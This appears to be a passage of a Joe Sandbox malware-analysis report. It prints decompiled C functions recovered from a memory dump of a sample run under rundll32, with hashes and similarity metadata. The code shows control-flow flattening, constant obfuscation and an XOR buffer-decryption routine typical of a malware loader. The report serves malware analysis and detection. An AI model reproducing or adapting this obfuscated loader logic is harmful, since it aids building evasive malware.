                                                                                                                                                            							if(E0038D8EC(_v52, _v56,  &_v20, _t184) != 0) {
                                                                                                                                                            								_t164 = 0xe01b1ec;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t164 == 0xe01b1ec) {
                                                                                                                                                            								E00390AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
                                                                                                                                                            								_t189 =  &(_t189[0xa]);
                                                                                                                                                            								_t164 = 0x2524be6;
                                                                                                                                                            								_t185 =  !=  ? 1 : _t185;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t164 != 0xe41debb) {
                                                                                                                                                            									L13:
                                                                                                                                                            									if(_t164 != 0x78a313b) {
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t161 = E00373DE2(_t164);
                                                                                                                                                            									_t184 = _t161;
                                                                                                                                                            									if(_t161 != 0xffffffff) {
                                                                                                                                                            										_t164 = 0xdd773d9;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t185;
                                                                                                                                                            				}
                                                                                                                                                            				E00381E67(_v36, _v40, _v44, _v48, _v20);
                                                                                                                                                            				_t189 =  &(_t189[3]);
                                                                                                                                                            				_t164 = 0x78a313b;
                                                                                                                                                            				goto L13;
                                                                                                                                                            			}





























                                                                                                                                                            0x0038bdb4
                                                                                                                                                            0x0038bdbb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd5d
                                                                                                                                                            0x0038bd63
                                                                                                                                                            0x0038be11
                                                                                                                                                            0x0038be17
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd69
                                                                                                                                                            0x0038bd71
                                                                                                                                                            0x0038bd76
                                                                                                                                                            0x0038bd7b
                                                                                                                                                            0x0038bd81
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd81
                                                                                                                                                            0x0038bd7b
                                                                                                                                                            0x0038bd63
                                                                                                                                                            0x0038bd5b
                                                                                                                                                            0x0038bd53
                                                                                                                                                            0x0038be26
                                                                                                                                                            0x0038be26
                                                                                                                                                            0x0038be04
                                                                                                                                                            0x0038be09
                                                                                                                                                            0x0038be0c
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 6]
                                                                                                                                                            • API String ID: 0-3974934468
                                                                                                                                                            • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                                            • Instruction ID: 66aaac2f21e750288b00074470b1b8231166d775459c47f89c03c89ed9e1ef1c
                                                                                                                                                            • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                                            • Instruction Fuzzy Hash: 89714F71108342AFC359DF26C88941BFBE5FBC9758F504A1EF6969A260D372DA098F43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E00375361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				unsigned int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				unsigned int _v32;
                                                                                                                                                            				void* __edx;
                                                                                                                                                            				void* _t84;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				signed int _t120;
                                                                                                                                                            				signed int _t121;
                                                                                                                                                            				signed int _t122;
                                                                                                                                                            				void* _t124;
                                                                                                                                                            				signed int* _t127;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				E003820B9(_t84);
                                                                                                                                                            				_v4 = 0x18047d;
                                                                                                                                                            				_t127 =  &(( &_v32)[5]);
                                                                                                                                                            				_v4 = _v4 >> 0xa;
                                                                                                                                                            				_v4 = _v4 ^ 0x000d3248;
                                                                                                                                                            				_t124 = 0;
                                                                                                                                                            				_v28 = 0x90acd4;
                                                                                                                                                            				_t104 = 0x35df4ed;
                                                                                                                                                            				_v28 = _v28 >> 5;
                                                                                                                                                            				_v28 = _v28 + 0xffff3107;
                                                                                                                                                            				_v28 = _v28 | 0xd0f9b279;
                                                                                                                                                            				_v28 = _v28 ^ 0xd0f1daef;
                                                                                                                                                            				_v8 = 0x9d14b7;
                                                                                                                                                            				_v8 = _v8 << 2;
                                                                                                                                                            				_v8 = _v8 ^ 0x027823b1;
                                                                                                                                                            				_v32 = 0xfd6947;
                                                                                                                                                            				_v32 = _v32 + 0xffff03bf;
                                                                                                                                                            				_t120 = 0x72;
                                                                                                                                                            				_v32 = _v32 / _t120;
                                                                                                                                                            				_v32 = _v32 >> 0xa;
                                                                                                                                                            				_v32 = _v32 ^ 0x00066e44;
                                                                                                                                                            				_v16 = 0x111da;
                                                                                                                                                            				_v16 = _v16 ^ 0xdd7c73d4;
                                                                                                                                                            				_v16 = _v16 | 0x7d37165e;
                                                                                                                                                            				_v16 = _v16 ^ 0xfd769a76;
                                                                                                                                                            				_v12 = 0x2531de;
                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                            				_v12 = _v12 ^ 0xa63e9142;
                                                                                                                                                            				_v20 = 0x6e0002;
                                                                                                                                                            				_v20 = _v20 >> 0xe;
                                                                                                                                                            				_t121 = 0xe;
                                                                                                                                                            				_v20 = _v20 / _t121;
                                                                                                                                                            				_t122 = 0x3d;
                                                                                                                                                            				_v20 = _v20 * 0x64;
                                                                                                                                                            				_v20 = _v20 ^ 0x000bef19;
                                                                                                                                                            				_v24 = 0xa3fc95;
                                                                                                                                                            				_v24 = _v24 + 0xdcd1;
                                                                                                                                                            				_v24 = _v24 << 3;
                                                                                                                                                            				_v24 = _v24 / _t122;
                                                                                                                                                            				_v24 = _v24 ^ 0x0013a2ec;
                                                                                                                                                            				while(_t104 != 0x311781) {
                                                                                                                                                            					if(_t104 == 0x35df4ed) {
                                                                                                                                                            						_push(_t104);
                                                                                                                                                            						_push(_t104);
                                                                                                                                                            						_t118 = 0x28;
                                                                                                                                                            						 *0x393e08 = E00377FF2(_t118);
                                                                                                                                                            						_t104 = 0x605992c;
                                                                                                                                                            						continue;
                                                                                                                                                            					} else {
                                                                                                                                                            						if(_t104 == 0x477ef52) {
                                                                                                                                                            							E0037924B();
                                                                                                                                                            							_t104 = 0x311781;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t104 == 0x605992c) {
                                                                                                                                                            								if(E00390F33() != 0) {
                                                                                                                                                            									_t104 = 0xdb1ba22;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t104 != 0xdb1ba22) {
                                                                                                                                                            									L13:
                                                                                                                                                            									if(_t104 != 0x5723dc8) {
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t124 = E0037960D(_v16, _a12, _a8, _v12);
                                                                                                                                                            									_t127 =  &(_t127[3]);
                                                                                                                                                            									if(_t124 == 0) {
                                                                                                                                                            										_t104 = 0x477ef52;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t124;
                                                                                                                                                            				}
                                                                                                                                                            				E00388519(_v20, _v24,  *0x393e08);
                                                                                                                                                            				_t104 = 0x5723dc8;
                                                                                                                                                            				goto L13;
                                                                                                                                                            			}




















                                                                                                                                                            0x00375443
                                                                                                                                                            0x0037544b
                                                                                                                                                            0x00375454
                                                                                                                                                            0x00375459
                                                                                                                                                            0x00375464
                                                                                                                                                            0x00375465
                                                                                                                                                            0x00375469
                                                                                                                                                            0x00375471
                                                                                                                                                            0x00375479
                                                                                                                                                            0x00375481
                                                                                                                                                            0x00375491
                                                                                                                                                            0x00375495
                                                                                                                                                            0x0037549d
                                                                                                                                                            0x003754a7
                                                                                                                                                            0x00375501
                                                                                                                                                            0x00375502
                                                                                                                                                            0x00375505
                                                                                                                                                            0x0037550d
                                                                                                                                                            0x00375512
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754a9
                                                                                                                                                            0x003754ab
                                                                                                                                                            0x003754ec
                                                                                                                                                            0x003754f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754ad
                                                                                                                                                            0x003754b3
                                                                                                                                                            0x003754e6
                                                                                                                                                            0x003754e8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754e8
                                                                                                                                                            0x003754b5
                                                                                                                                                            0x003754b7
                                                                                                                                                            0x00375532
                                                                                                                                                            0x00375538
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754b9
                                                                                                                                                            0x003754d2
                                                                                                                                                            0x003754d4
                                                                                                                                                            0x003754d9
                                                                                                                                                            0x003754db
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754db
                                                                                                                                                            0x003754d9
                                                                                                                                                            0x003754b7
                                                                                                                                                            0x003754b3
                                                                                                                                                            0x003754ab
                                                                                                                                                            0x00375547
                                                                                                                                                            0x00375547
                                                                                                                                                            0x00375527
                                                                                                                                                            0x0037552d
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H2
                                                                                                                                                            • API String ID: 0-302591398
                                                                                                                                                            • Opcode ID: 07604ddabf1f926beb7c63d8f3851f573fab259a628f5ac5934b904d58981b32
                                                                                                                                                            • Instruction ID: 33c33e26a7a2a7d085dae28d625f56cf3048c9d1a2b6e0211c374ec3fc3b05d7
                                                                                                                                                            • Opcode Fuzzy Hash: 07604ddabf1f926beb7c63d8f3851f573fab259a628f5ac5934b904d58981b32
                                                                                                                                                            • Instruction Fuzzy Hash: 3241C1726083019FC729DF15E44941FBBE1FBD8718F148A1DF58A56260D7B5CA48CB83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00378B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				void* _t83;
                                                                                                                                                            				void* _t89;
                                                                                                                                                            				signed int _t93;
                                                                                                                                                            				void* _t96;
                                                                                                                                                            				void* _t108;
                                                                                                                                                            				void* _t109;
                                                                                                                                                            				void* _t111;
                                                                                                                                                            				void* _t112;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t83);
                                                                                                                                                            				_v72 = 0xbb1237;
                                                                                                                                                            				_t112 = _t111 + 0x18;
                                                                                                                                                            				_v72 = _v72 >> 0xf;
                                                                                                                                                            				_v72 = _v72 + 0xd544;
                                                                                                                                                            				_t109 = 0;
                                                                                                                                                            				_v72 = _v72 ^ 0x000eb3e9;
                                                                                                                                                            				_t96 = 0x815a082;
                                                                                                                                                            				_v48 = 0x50cb35;
                                                                                                                                                            				_v48 = _v48 + 0xffff87ec;
                                                                                                                                                            				_v48 = _v48 ^ 0x00585237;
                                                                                                                                                            				_v52 = 0xa4cd83;
                                                                                                                                                            				_v52 = _v52 ^ 0x5b114d95;
                                                                                                                                                            				_v52 = _v52 ^ 0x5bb6524d;
                                                                                                                                                            				_v56 = 0xbe8ecf;
                                                                                                                                                            				_v56 = _v56 << 0xe;
                                                                                                                                                            				_v56 = _v56 ^ 0xa3b0842f;
                                                                                                                                                            				_v60 = 0x771210;
                                                                                                                                                            				_v60 = _v60 | 0x3e44f288;
                                                                                                                                                            				_v60 = _v60 ^ 0x3e758d5b;
                                                                                                                                                            				_v80 = 0xf3b10d;
                                                                                                                                                            				_v80 = _v80 ^ 0x3cb59f0c;
                                                                                                                                                            				_v80 = _v80 >> 4;
                                                                                                                                                            				_v80 = _v80 + 0xffffd90b;
                                                                                                                                                            				_v80 = _v80 ^ 0x03c55d5e;
                                                                                                                                                            				_v64 = 0x352515;
                                                                                                                                                            				_v64 = _v64 ^ 0x7339bda5;
                                                                                                                                                            				_v64 = _v64 + 0x1326;
                                                                                                                                                            				_v64 = _v64 ^ 0x7306d08c;
                                                                                                                                                            				_v68 = 0x4f62f3;
                                                                                                                                                            				_v68 = _v68 << 0xd;
                                                                                                                                                            				_v68 = _v68 ^ 0x83faab25;
                                                                                                                                                            				_v68 = _v68 ^ 0x6fa8977d;
                                                                                                                                                            				_v76 = 0x2ac691;
                                                                                                                                                            				_v76 = _v76 << 9;
                                                                                                                                                            				_t93 = 0x6b;
                                                                                                                                                            				_v76 = _v76 / _t93;
                                                                                                                                                            				_v76 = _v76 << 0xc;
                                                                                                                                                            				_v76 = _v76 ^ 0xcae566b9;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t96 != 0x54856a9) {
                                                                                                                                                            						if(_t96 == 0x815a082) {
                                                                                                                                                            							_t96 = 0x54856a9;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t96 == 0xa9da54a) {
                                                                                                                                                            								_t89 = E0038D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
                                                                                                                                                            								_t112 = _t112 + 0xc;
                                                                                                                                                            								__eflags = _t89;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_t96 = 0xefea9c1;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t118 = _t96 - 0xefea9c1;
                                                                                                                                                            								if(_t96 != 0xefea9c1) {
                                                                                                                                                            									goto L11;
                                                                                                                                                            								} else {
                                                                                                                                                            									E0038D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
                                                                                                                                                            									_t109 =  !=  ? 1 : _t109;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L6:
                                                                                                                                                            						return _t109;
                                                                                                                                                            					}
                                                                                                                                                            					E00373DBC( &_v44, _a8, _v72, _v48, _v52);
                                                                                                                                                            					_t112 = _t112 + 0xc;
                                                                                                                                                            					_t96 = 0xa9da54a;
                                                                                                                                                            					L11:
                                                                                                                                                            					__eflags = _t96 - 0x309e957;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L6;
                                                                                                                                                            			}

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 7RX
                                                                                                                                                            • API String ID: 0-861457431
                                                                                                                                                            • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                                            • Instruction ID: 3194f5266dbb8c4af1211b0a2e7543d85ad7917d9210b6cd8230722337ef68ad
                                                                                                                                                            • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                                            • Instruction Fuzzy Hash: 884187711093029BC7A68F21848982FBBE1FFC4788F104A2DF59A92120D7758A198F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00387BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				signed int _t60;
                                                                                                                                                            				signed int _t67;
                                                                                                                                                            				unsigned int _t71;
                                                                                                                                                            				signed int _t74;
                                                                                                                                                            				signed int _t76;
                                                                                                                                                            				signed int _t77;
                                                                                                                                                            				void* _t85;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				void* _t98;
                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                            				signed int* _t100;
                                                                                                                                                            				signed int* _t101;
                                                                                                                                                            				signed int* _t102;
                                                                                                                                                            
                                                                                                                                                            				_t100 = _a8;
                                                                                                                                                            				_t102 = __ecx;
                                                                                                                                                            				_push(_t100);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t53);
                                                                                                                                                            				_v12 = 0x7b3704;
                                                                                                                                                            				_t99 = 0;
                                                                                                                                                            				_v8 = 0x80915f;
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_v24 = 0xa71362;
                                                                                                                                                            				_v24 = _v24 << 0xb;
                                                                                                                                                            				_v24 = _v24 + 0x3e5;
                                                                                                                                                            				_v24 = _v24 ^ 0x3895df4e;
                                                                                                                                                            				_v28 = 0xc4b4e;
                                                                                                                                                            				_t76 = 0x2f;
                                                                                                                                                            				_v28 = _v28 * 0x14;
                                                                                                                                                            				_v28 = _v28 | 0x55175d82;
                                                                                                                                                            				_v28 = _v28 ^ 0x65144985;
                                                                                                                                                            				_v28 = _v28 ^ 0x30e15ded;
                                                                                                                                                            				_a8 = 0x3b45b7;
                                                                                                                                                            				_a8 = _a8 / _t76;
                                                                                                                                                            				_a8 = _a8 << 4;
                                                                                                                                                            				_t77 = 0x6c;
                                                                                                                                                            				_a8 = _a8 / _t77;
                                                                                                                                                            				_a8 = _a8 ^ 0x000cc8ea;
                                                                                                                                                            				_t60 =  *_t100;
                                                                                                                                                            				_t101 =  &(_t100[2]);
                                                                                                                                                            				_t92 = _t100[1] ^ _t60;
                                                                                                                                                            				_v20 = _t60;
                                                                                                                                                            				_v16 = _t92;
                                                                                                                                                            				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
                                                                                                                                                            				_t67 = E00377FF2(_t71);
                                                                                                                                                            				_a8 = _t67;
                                                                                                                                                            				if(_t67 != 0) {
                                                                                                                                                            					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
                                                                                                                                                            					if(_t98 != 0) {
                                                                                                                                                            						_t74 = _v20;
                                                                                                                                                            						_t85 = _t67 - _t101;
                                                                                                                                                            						do {
                                                                                                                                                            							_t99 = _t99 + 1;
                                                                                                                                                            							 *(_t85 + _t101) =  *_t101 ^ _t74;
                                                                                                                                                            							_t101 =  &(_t101[1]);
                                                                                                                                                            						} while (_t99 < _t98);
                                                                                                                                                            						_t67 = _a8;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t102 != 0) {
                                                                                                                                                            						 *_t102 = _v16;
                                                                                                                                                            						return _t67;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t67;
                                                                                                                                                            			}


                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ]0
                                                                                                                                                            • API String ID: 0-3096761382
                                                                                                                                                            • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                                            • Instruction ID: f44bc11c44f98108b9f5aa77891cd303918b2e1a518e013b503576d070806d34
                                                                                                                                                            • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                                            • Instruction Fuzzy Hash: 453177716093008FD318DF29C88594BFBE6EBC9708F108A2EF58997251DBB5E9058B56
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00373C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				char _v564;
                                                                                                                                                            				void* _t97;
                                                                                                                                                            				signed int _t114;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int _t116;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t97);
                                                                                                                                                            				_v32 = 0xf161c0;
                                                                                                                                                            				_v32 = _v32 + 0xffff8ad4;
                                                                                                                                                            				_v32 = _v32 ^ 0x00fbd9a3;
                                                                                                                                                            				_v28 = 0xfc9039;
                                                                                                                                                            				_t114 = 0x1b;
                                                                                                                                                            				_v28 = _v28 / _t114;
                                                                                                                                                            				_t115 = 5;
                                                                                                                                                            				_v28 = _v28 * 0x6e;
                                                                                                                                                            				_v28 = _v28 ^ 0x040e4771;
                                                                                                                                                            				_v44 = 0x2ba482;
                                                                                                                                                            				_v44 = _v44 | 0x0543644d;
                                                                                                                                                            				_v44 = _v44 ^ 0x0568ae00;
                                                                                                                                                            				_v36 = 0xddb19;
                                                                                                                                                            				_t116 = 0x23;
                                                                                                                                                            				_v36 = _v36 / _t115;
                                                                                                                                                            				_v36 = _v36 ^ 0x000396ce;
                                                                                                                                                            				_v8 = 0xc420c0;
                                                                                                                                                            				_v8 = _v8 >> 8;
                                                                                                                                                            				_v8 = _v8 + 0xffff6316;
                                                                                                                                                            				_v8 = _v8 * 0x7a;
                                                                                                                                                            				_v8 = _v8 ^ 0x001ea2c5;
                                                                                                                                                            				_v12 = 0xb92025;
                                                                                                                                                            				_v12 = _v12 >> 3;
                                                                                                                                                            				_v12 = _v12 + 0xfe32;
                                                                                                                                                            				_v12 = _v12 << 0xe;
                                                                                                                                                            				_v12 = _v12 ^ 0x088e8322;
                                                                                                                                                            				_v24 = 0x144a1a;
                                                                                                                                                            				_v24 = _v24 + 0xffffa246;
                                                                                                                                                            				_v24 = _v24 + 0xffff01e3;
                                                                                                                                                            				_v24 = _v24 ^ 0x001122d6;
                                                                                                                                                            				_v16 = 0x7d3361;
                                                                                                                                                            				_v16 = _v16 / _t116;
                                                                                                                                                            				_v16 = _v16 << 4;
                                                                                                                                                            				_v16 = _v16 >> 9;
                                                                                                                                                            				_v16 = _v16 ^ 0x00004840;
                                                                                                                                                            				_v20 = 0xb3d6e6;
                                                                                                                                                            				_v20 = _v20 ^ 0x61ac6c83;
                                                                                                                                                            				_v20 = _v20 ^ 0xeb92407c;
                                                                                                                                                            				_v20 = _v20 ^ 0x8a8fe9bf;
                                                                                                                                                            				_v40 = 0xbcf254;
                                                                                                                                                            				_v40 = _v40 << 0xc;
                                                                                                                                                            				_v40 = _v40 ^ 0xcf275652;
                                                                                                                                                            				_push(_v44);
                                                                                                                                                            				_push(_v28);
                                                                                                                                                            				E0037A918(_a4, _v40, _v36, _v8, E0038DCF7(_v32, 0x3717c0, _v40), _v12,  &_v564);
                                                                                                                                                            				E0037A8B0(_v24, _t107, _v16);
                                                                                                                                                            				return E00381F8A(_v20, _v40,  &_v564);
                                                                                                                                                            			}


















                                                                                                                                                            0x00373dbb

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: a3}
                                                                                                                                                            • API String ID: 0-1821053108
                                                                                                                                                            • Opcode ID: 49153f6bc62b15b6440a583e104a878da418189976c06309ca3dbe04ee51d1f0
                                                                                                                                                            • Instruction ID: 7b3c5f7f70f10b136ed5719ec76bdfd572bc72c32cd260e817285ef4eeb7abd2
                                                                                                                                                            • Opcode Fuzzy Hash: 49153f6bc62b15b6440a583e104a878da418189976c06309ca3dbe04ee51d1f0
                                                                                                                                                            • Instruction Fuzzy Hash: CF41F371D00209EBCF19DFE0D94A4EEBBB2FB44314F208199E510BA260D7B95B55DF91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00388606(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				signed int _t50;
                                                                                                                                                            				unsigned int* _t63;
                                                                                                                                                            				signed int _t64;
                                                                                                                                                            				signed int _t66;
                                                                                                                                                            				signed int _t72;
                                                                                                                                                            				unsigned int _t73;
                                                                                                                                                            				unsigned int _t74;
                                                                                                                                                            				unsigned int* _t78;
                                                                                                                                                            				signed int* _t79;
                                                                                                                                                            				signed int* _t80;
                                                                                                                                                            				unsigned int _t82;
                                                                                                                                                            				void* _t88;
                                                                                                                                                            				void* _t90;
                                                                                                                                                            				void* _t92;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            
                                                                                                                                                            				_push( *(_t92 + 0x2c));
                                                                                                                                                            				_push( *(_t92 + 0x2c));
                                                                                                                                                            				_push( *(_t92 + 0x2c));
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t46);
                                                                                                                                                            				 *(_t92 + 0x20) = 0xe2d3c4;
                                                                                                                                                            				_t79 =  &(__edx[1]);
                                                                                                                                                            				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
                                                                                                                                                            				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
                                                                                                                                                            				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
                                                                                                                                                            				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
                                                                                                                                                            				 *(_t92 + 0x28) = 0xf8496b;
                                                                                                                                                            				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
